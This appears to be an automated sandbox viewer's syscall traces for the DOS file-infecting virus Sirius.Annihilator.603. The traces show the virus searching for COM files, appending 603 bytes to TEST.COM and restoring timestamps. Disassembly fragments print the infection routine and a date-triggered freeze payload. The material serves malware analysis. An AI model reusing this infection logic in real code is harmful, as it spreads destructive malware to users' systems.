Sample viewer

vx.netlux.org/Virus.DOS.Sirius.Annihilator.603

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-17T23:03:38.47054763Z	53	PC: 15308 \| Get interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-17T23:03:38.472978558Z	37	PC: 1531b \| Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-17T23:03:38.475056096Z	26	PC: 1518d \| Set disk transfer address
2018-12-17T23:03:38.476722069Z	25	PC: 1519b \| Get default drive
2018-12-17T23:03:38.478688494Z	14	PC: 151a6 \| Set default drive (Drive = 'C')
2018-12-17T23:03:38.481499513Z	78	PC: 151d6 \| Find first file
2018-12-17T23:03:38.49119737Z	61	PC: 151e4 \| Open file (Filename = 'COMMAND.COM')
2018-12-17T23:03:38.510953033Z	66	PC: 152d7 \| Move file pointer
2018-12-17T23:03:38.513616987Z	62	PC: 1520b \| Close file
2018-12-17T23:03:38.516083025Z	79	PC: 151d6 \| Find next file
2018-12-17T23:03:38.519303977Z	14	PC: 151b2 \| Set default drive (Drive = 'A')
2018-12-17T23:03:38.522525465Z	78	PC: 151d6 \| Find first file
2018-12-17T23:03:38.547956995Z	61	PC: 151e4 \| Open file (Filename = 'SLEEP.COM')
2018-12-17T23:03:38.56644069Z	66	PC: 152d7 \| Move file pointer
2018-12-17T23:03:38.572045471Z	62	PC: 1520b \| Close file
2018-12-17T23:03:38.573973972Z	79	PC: 151d6 \| Find next file
2018-12-17T23:03:38.576751224Z	61	PC: 151e4 \| Open file (Filename = 'PRINT.COM')
2018-12-17T23:03:38.58471886Z	66	PC: 152d7 \| Move file pointer
2018-12-17T23:03:38.586449761Z	62	PC: 1520b \| Close file
2018-12-17T23:03:38.588572894Z	79	PC: 151d6 \| Find next file
2018-12-17T23:03:38.59103213Z	61	PC: 151e4 \| Open file (Filename = 'HELLO.COM')
2018-12-17T23:03:38.598900966Z	66	PC: 152d7 \| Move file pointer
2018-12-17T23:03:38.600347655Z	62	PC: 1520b \| Close file
2018-12-17T23:03:38.602008523Z	79	PC: 151d6 \| Find next file
2018-12-17T23:03:38.605584473Z	61	PC: 151e4 \| Open file (Filename = 'PHANG.COM')
2018-12-17T23:03:38.612626244Z	66	PC: 152d7 \| Move file pointer
2018-12-17T23:03:38.613927912Z	62	PC: 1520b \| Close file
2018-12-17T23:03:38.616211944Z	79	PC: 151d6 \| Find next file
2018-12-17T23:03:38.619172681Z	61	PC: 151e4 \| Open file (Filename = 'PRINTA~1.COM')
2018-12-17T23:03:38.62458321Z	66	PC: 152d7 \| Move file pointer
2018-12-17T23:03:38.626645882Z	62	PC: 1520b \| Close file
2018-12-17T23:03:38.631908437Z	79	PC: 151d6 \| Find next file
2018-12-17T23:03:38.63464649Z	61	PC: 151e4 \| Open file (Filename = 'MANDEL.COM')
2018-12-17T23:03:38.643264899Z	66	PC: 152d7 \| Move file pointer
2018-12-17T23:03:38.644911702Z	62	PC: 1520b \| Close file
2018-12-17T23:03:38.646665654Z	79	PC: 151d6 \| Find next file
2018-12-17T23:03:38.650130371Z	61	PC: 151e4 \| Open file (Filename = 'PAH.COM')
2018-12-17T23:03:38.659187302Z	66	PC: 152d7 \| Move file pointer
2018-12-17T23:03:38.661031809Z	62	PC: 1520b \| Close file
2018-12-17T23:03:38.663341325Z	79	PC: 151d6 \| Find next file
2018-12-17T23:03:38.666678079Z	61	PC: 151e4 \| Open file (Filename = 'TEST.COM')
2018-12-17T23:03:38.674112342Z	66	PC: 152d7 \| Move file pointer
2018-12-17T23:03:38.675941724Z	87	PC: 151fb \| Get or set file date and time
2018-12-17T23:03:38.678453398Z	44	PC: 1521b \| Get time 0x1521b: or dx, dx 0x1521d: je 0x15217 0x1521f: mov word ptr ds:[bp + 0x35e], dx 0x15224: and dx, 7 0x15227: add dx, dx 0x15229: mov word ptr [0xf4], dx 0x1522d: mov ax, 0x4200 0x15230: call 0x152d1 0x15233: mov ah, 0x3f 0x15235: lea dx, word ptr [bp + 0x355] 0x15239: mov cx, 3 0x1523c: int 0x21 0x1523e: cmp byte ptr ds:[bp + 0x355], 0x4d 0x15244: je 0x15207 0x15246: cmp byte ptr ds:[bp + 0x355], 0x5a 0x1524c: je 0x15207 0x1524e: mov ax, 0x4202 0x15251: call 0x152d1 0x15254: sub ax, 3 0x15257: mov word ptr cs:[bp + 0x353], ax
2018-12-17T23:03:38.681222178Z	66	PC: 152d7 \| Move file pointer
2018-12-17T23:03:38.683124875Z	63	PC: 1523e \| Read file or device (Read 3 bytes on handle 5)
2018-12-17T23:03:38.687376795Z	66	PC: 152d7 \| Move file pointer
2018-12-17T23:03:38.689881883Z	64	PC: 15296 \| Write file or device (Write 603 bytes on handle 5)
2018-12-17T23:03:38.705408654Z	66	PC: 152d7 \| Move file pointer
2018-12-17T23:03:38.708286812Z	64	PC: 152a7 \| Write file or device (Write 3 bytes on handle 5)
2018-12-17T23:03:38.711906406Z	87	PC: 152ae \| Get or set file date and time
2018-12-17T23:03:38.713718693Z	62	PC: 152b2 \| Close file
2018-12-17T23:03:38.722426973Z	42	PC: 152b6 \| Get date 0x152b6: cmp dh, dl 0x152b8: jne 0x152cd 0x152ba: mov ah, 0x2c 0x152bc: int 0x21 0x152be: and dh, 7 0x152c1: jne 0x152cd 0x152c3: mov ah, 9 0x152c5: lea dx, word ptr [bp + 0x2e9] 0x152c9: int 0x21 0x152cb: cli 0x152cc: hlt 0x152cd: pop dx 0x152ce: pop cx 0x152cf: pop bx 0x152d0: ret 0x152d1: xor cx, cx 0x152d3: xor dx, dx 0x152d5: int 0x21 0x152d7: ret 0x152d8: pop word ptr cs:[0xf6]
2018-12-17T23:03:38.724544885Z	26	PC: 151bc \| Set disk transfer address
2018-12-17T23:03:38.725533105Z	37	PC: 1532c \| Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-17T23:03:38.728271647Z	9	PC: 12bb5 \| Display string (String= '')
2018-12-17T23:03:38.738966403Z	9	PC: 12bbc \| Display string (Could not find end pointer)
2018-12-17T23:03:38.76241662Z	76	PC: 12bd2 \| Terminate with return code (Return code = '0')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":14608,"SideJobID":0}

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-25T12:41:06.171037683Z	53	PC: 15308 \| Get interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T12:41:06.173369968Z	37	PC: 1531b \| Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T12:41:06.175580134Z	26	PC: 1518d \| Set disk transfer address
2018-12-25T12:41:06.1773804Z	25	PC: 1519b \| Get default drive
2018-12-25T12:41:06.179682314Z	14	PC: 151a6 \| Set default drive (Drive = 'C')
2018-12-25T12:41:06.181692791Z	78	PC: 151d6 \| Find first file
2018-12-25T12:41:06.187751094Z	61	PC: 151e4 \| Open file (Filename = 'COMMAND.COM')
2018-12-25T12:41:06.194562666Z	66	PC: 152d7 \| Move file pointer
2018-12-25T12:41:06.196125762Z	62	PC: 1520b \| Close file
2018-12-25T12:41:06.197790512Z	79	PC: 151d6 \| Find next file (See above)
2018-12-25T12:41:06.200307804Z	14	PC: 151b2 \| Set default drive (Drive = 'A')
2018-12-25T12:41:06.201818702Z	78	PC: 151d6 \| Find first file (See above)
2018-12-25T12:41:06.207738042Z	61	PC: 151e4 \| Open file (See above)
2018-12-25T12:41:06.214678727Z	66	PC: 152d7 \| Move file pointer (See above)
2018-12-25T12:41:06.217718845Z	62	PC: 1520b \| Close file (See above)
2018-12-25T12:41:06.219316661Z	79	PC: 151d6 \| Find next file (See above)
2018-12-25T12:41:06.221753488Z	61	PC: 151e4 \| Open file (See above)
2018-12-25T12:41:06.228886618Z	66	PC: 152d7 \| Move file pointer (See above)
2018-12-25T12:41:06.230664917Z	62	PC: 1520b \| Close file (See above)
2018-12-25T12:41:06.232740209Z	79	PC: 151d6 \| Find next file (See above)
2018-12-25T12:41:06.241087343Z	61	PC: 151e4 \| Open file (See above)
2018-12-25T12:41:06.248778136Z	66	PC: 152d7 \| Move file pointer (See above)
2018-12-25T12:41:06.250269817Z	62	PC: 1520b \| Close file (See above)
2018-12-25T12:41:06.252094858Z	79	PC: 151d6 \| Find next file (See above)
2018-12-25T12:41:06.254895341Z	61	PC: 151e4 \| Open file (See above)
2018-12-25T12:41:06.26183523Z	66	PC: 152d7 \| Move file pointer (See above)
2018-12-25T12:41:06.265071885Z	62	PC: 1520b \| Close file (See above)
2018-12-25T12:41:06.266731117Z	79	PC: 151d6 \| Find next file (See above)
2018-12-25T12:41:06.269066795Z	61	PC: 151e4 \| Open file (See above)
2018-12-25T12:41:06.287459079Z	66	PC: 152d7 \| Move file pointer (See above)
2018-12-25T12:41:06.289676429Z	62	PC: 1520b \| Close file (See above)
2018-12-25T12:41:06.292370735Z	79	PC: 151d6 \| Find next file (See above)
2018-12-25T12:41:06.295471136Z	61	PC: 151e4 \| Open file (See above)
2018-12-25T12:41:06.303923952Z	66	PC: 152d7 \| Move file pointer (See above)
2018-12-25T12:41:06.305212226Z	62	PC: 1520b \| Close file (See above)
2018-12-25T12:41:06.307317191Z	79	PC: 151d6 \| Find next file (See above)
2018-12-25T12:41:06.309699873Z	61	PC: 151e4 \| Open file (See above)
2018-12-25T12:41:06.313880287Z	66	PC: 152d7 \| Move file pointer (See above)
2018-12-25T12:41:06.315121023Z	62	PC: 1520b \| Close file (See above)
2018-12-25T12:41:06.316440272Z	79	PC: 151d6 \| Find next file (See above)
2018-12-25T12:41:06.317983209Z	61	PC: 151e4 \| Open file (See above)
2018-12-25T12:41:06.322357039Z	66	PC: 152d7 \| Move file pointer (See above)
2018-12-25T12:41:06.324058583Z	87	PC: 151fb \| Get or set file date and time
2018-12-25T12:41:06.325201327Z	44	PC: 1521b \| Get time 0x1521b: or dx, dx 0x1521d: je 0x15217 0x1521f: mov word ptr ds:[bp + 0x35e], dx 0x15224: and dx, 7 0x15227: add dx, dx 0x15229: mov word ptr [0xf4], dx 0x1522d: mov ax, 0x4200 0x15230: call 0x152d1 0x15233: mov ah, 0x3f 0x15235: lea dx, word ptr [bp + 0x355] 0x15239: mov cx, 3 0x1523c: int 0x21 0x1523e: cmp byte ptr ds:[bp + 0x355], 0x4d 0x15244: je 0x15207 0x15246: cmp byte ptr ds:[bp + 0x355], 0x5a 0x1524c: je 0x15207 0x1524e: mov ax, 0x4202 0x15251: call 0x152d1 0x15254: sub ax, 3 0x15257: mov word ptr cs:[bp + 0x353], ax
2018-12-25T12:41:06.327293058Z	66	PC: 152d7 \| Move file pointer (See above)
2018-12-25T12:41:06.328429526Z	63	PC: 1523e \| Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:41:06.330144455Z	66	PC: 152d7 \| Move file pointer (See above)
2018-12-25T12:41:06.331444949Z	64	PC: 15296 \| Write file or device (Write 603 bytes on handle 5)
2018-12-25T12:41:06.343624935Z	66	PC: 152d7 \| Move file pointer (See above)
2018-12-25T12:41:06.344625439Z	64	PC: 152a7 \| Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:41:06.346906351Z	87	PC: 152ae \| Get or set file date and time
2018-12-25T12:41:06.34829406Z	62	PC: 152b2 \| Close file
2018-12-25T12:41:06.356899392Z	42	PC: 152b6 \| Get date 0x152b6: cmp dh, dl 0x152b8: jne 0x152cd 0x152ba: mov ah, 0x2c 0x152bc: int 0x21 0x152be: and dh, 7 0x152c1: jne 0x152cd 0x152c3: mov ah, 9 0x152c5: lea dx, word ptr [bp + 0x2e9] 0x152c9: int 0x21 0x152cb: cli 0x152cc: hlt 0x152cd: pop dx 0x152ce: pop cx 0x152cf: pop bx 0x152d0: ret 0x152d1: xor cx, cx 0x152d3: xor dx, dx 0x152d5: int 0x21 0x152d7: ret 0x152d8: pop word ptr cs:[0xf6]
2018-12-25T12:41:06.35943346Z	44	PC: 152be \| Get time 0x152be: and dh, 7 0x152c1: jne 0x152cd 0x152c3: mov ah, 9 0x152c5: lea dx, word ptr [bp + 0x2e9] 0x152c9: int 0x21 0x152cb: cli 0x152cc: hlt 0x152cd: pop dx 0x152ce: pop cx 0x152cf: pop bx 0x152d0: ret 0x152d1: xor cx, cx 0x152d3: xor dx, dx 0x152d5: int 0x21 0x152d7: ret 0x152d8: pop word ptr cs:[0xf6] 0x152dd: pop es 0x152de: pop ds 0x152df: pop si 0x152e0: pop di
2018-12-25T12:41:06.361923523Z	26	PC: 151bc \| Set disk transfer address
2018-12-25T12:41:06.363108861Z	37	PC: 1532c \| Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T12:41:06.366895216Z	9	PC: 12bb5 \| Display string (String= '')
2018-12-25T12:41:06.369501908Z	9	PC: 12bbc \| Display string (Could not find end pointer)
2018-12-25T12:41:06.38132144Z	76	PC: 12bd2 \| Terminate with return code (Return code = '0')

{"DateBased":true,"Day":2,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":14608,"SideJobID":0}

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-25T12:41:06.993363478Z	53	PC: 15308 \| Get interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T12:41:06.99586567Z	37	PC: 1531b \| Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T12:41:06.99839943Z	26	PC: 1518d \| Set disk transfer address
2018-12-25T12:41:06.999648773Z	25	PC: 1519b \| Get default drive
2018-12-25T12:41:07.001883002Z	14	PC: 151a6 \| Set default drive (Drive = 'C')
2018-12-25T12:41:07.003431543Z	78	PC: 151d6 \| Find first file
2018-12-25T12:41:07.009929287Z	61	PC: 151e4 \| Open file (Filename = 'COMMAND.COM')
2018-12-25T12:41:07.016952673Z	66	PC: 152d7 \| Move file pointer
2018-12-25T12:41:07.019137883Z	62	PC: 1520b \| Close file
2018-12-25T12:41:07.021320825Z	79	PC: 151d6 \| Find next file (See above)
2018-12-25T12:41:07.02408097Z	14	PC: 151b2 \| Set default drive (Drive = 'A')
2018-12-25T12:41:07.02620128Z	78	PC: 151d6 \| Find first file (See above)
2018-12-25T12:41:07.033024926Z	61	PC: 151e4 \| Open file (See above)
2018-12-25T12:41:07.040289542Z	66	PC: 152d7 \| Move file pointer (See above)
2018-12-25T12:41:07.042690476Z	62	PC: 1520b \| Close file (See above)
2018-12-25T12:41:07.045059884Z	79	PC: 151d6 \| Find next file (See above)
2018-12-25T12:41:07.048357199Z	61	PC: 151e4 \| Open file (See above)
2018-12-25T12:41:07.056753953Z	66	PC: 152d7 \| Move file pointer (See above)
2018-12-25T12:41:07.059490122Z	62	PC: 1520b \| Close file (See above)
2018-12-25T12:41:07.062545328Z	79	PC: 151d6 \| Find next file (See above)
2018-12-25T12:41:07.067073918Z	61	PC: 151e4 \| Open file (See above)
2018-12-25T12:41:07.075524419Z	66	PC: 152d7 \| Move file pointer (See above)
2018-12-25T12:41:07.077480864Z	62	PC: 1520b \| Close file (See above)
2018-12-25T12:41:07.079675321Z	79	PC: 151d6 \| Find next file (See above)
2018-12-25T12:41:07.08363966Z	61	PC: 151e4 \| Open file (See above)
2018-12-25T12:41:07.091048284Z	66	PC: 152d7 \| Move file pointer (See above)
2018-12-25T12:41:07.092632757Z	62	PC: 1520b \| Close file (See above)
2018-12-25T12:41:07.095663732Z	79	PC: 151d6 \| Find next file (See above)
2018-12-25T12:41:07.09886399Z	61	PC: 151e4 \| Open file (See above)
2018-12-25T12:41:07.106586342Z	66	PC: 152d7 \| Move file pointer (See above)
2018-12-25T12:41:07.109467408Z	62	PC: 1520b \| Close file (See above)
2018-12-25T12:41:07.11143804Z	79	PC: 151d6 \| Find next file (See above)
2018-12-25T12:41:07.114260502Z	61	PC: 151e4 \| Open file (See above)
2018-12-25T12:41:07.1219843Z	66	PC: 152d7 \| Move file pointer (See above)
2018-12-25T12:41:07.124031793Z	62	PC: 1520b \| Close file (See above)
2018-12-25T12:41:07.126294288Z	79	PC: 151d6 \| Find next file (See above)
2018-12-25T12:41:07.129992606Z	61	PC: 151e4 \| Open file (See above)
2018-12-25T12:41:07.1371956Z	66	PC: 152d7 \| Move file pointer (See above)
2018-12-25T12:41:07.138831439Z	62	PC: 1520b \| Close file (See above)
2018-12-25T12:41:07.141426225Z	79	PC: 151d6 \| Find next file (See above)
2018-12-25T12:41:07.145301009Z	61	PC: 151e4 \| Open file (See above)
2018-12-25T12:41:07.152912783Z	66	PC: 152d7 \| Move file pointer (See above)
2018-12-25T12:41:07.155009403Z	87	PC: 151fb \| Get or set file date and time
2018-12-25T12:41:07.157640869Z	44	PC: 1521b \| Get time 0x1521b: or dx, dx 0x1521d: je 0x15217 0x1521f: mov word ptr ds:[bp + 0x35e], dx 0x15224: and dx, 7 0x15227: add dx, dx 0x15229: mov word ptr [0xf4], dx 0x1522d: mov ax, 0x4200 0x15230: call 0x152d1 0x15233: mov ah, 0x3f 0x15235: lea dx, word ptr [bp + 0x355] 0x15239: mov cx, 3 0x1523c: int 0x21 0x1523e: cmp byte ptr ds:[bp + 0x355], 0x4d 0x15244: je 0x15207 0x15246: cmp byte ptr ds:[bp + 0x355], 0x5a 0x1524c: je 0x15207 0x1524e: mov ax, 0x4202 0x15251: call 0x152d1 0x15254: sub ax, 3 0x15257: mov word ptr cs:[bp + 0x353], ax
2018-12-25T12:41:07.160177199Z	66	PC: 152d7 \| Move file pointer (See above)
2018-12-25T12:41:07.161844486Z	63	PC: 1523e \| Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:41:07.169397248Z	66	PC: 152d7 \| Move file pointer (See above)
2018-12-25T12:41:07.171194632Z	64	PC: 15296 \| Write file or device (Write 603 bytes on handle 5)
2018-12-25T12:41:07.188230999Z	66	PC: 152d7 \| Move file pointer (See above)
2018-12-25T12:41:07.190491828Z	64	PC: 152a7 \| Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:41:07.193564602Z	87	PC: 152ae \| Get or set file date and time
2018-12-25T12:41:07.195204823Z	62	PC: 152b2 \| Close file
2018-12-25T12:41:07.204831592Z	42	PC: 152b6 \| Get date 0x152b6: cmp dh, dl 0x152b8: jne 0x152cd 0x152ba: mov ah, 0x2c 0x152bc: int 0x21 0x152be: and dh, 7 0x152c1: jne 0x152cd 0x152c3: mov ah, 9 0x152c5: lea dx, word ptr [bp + 0x2e9] 0x152c9: int 0x21 0x152cb: cli 0x152cc: hlt 0x152cd: pop dx 0x152ce: pop cx 0x152cf: pop bx 0x152d0: ret 0x152d1: xor cx, cx 0x152d3: xor dx, dx 0x152d5: int 0x21 0x152d7: ret 0x152d8: pop word ptr cs:[0xf6]
2018-12-25T12:41:07.207773248Z	26	PC: 151bc \| Set disk transfer address
2018-12-25T12:41:07.209682785Z	37	PC: 1532c \| Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T12:41:07.215122595Z	9	PC: 12bb5 \| Display string (String= '')
2018-12-25T12:41:07.222199077Z	9	PC: 12bbc \| Display string (Could not find end pointer)
2018-12-25T12:41:07.236396296Z	76	PC: 12bd2 \| Terminate with return code (Return code = '0')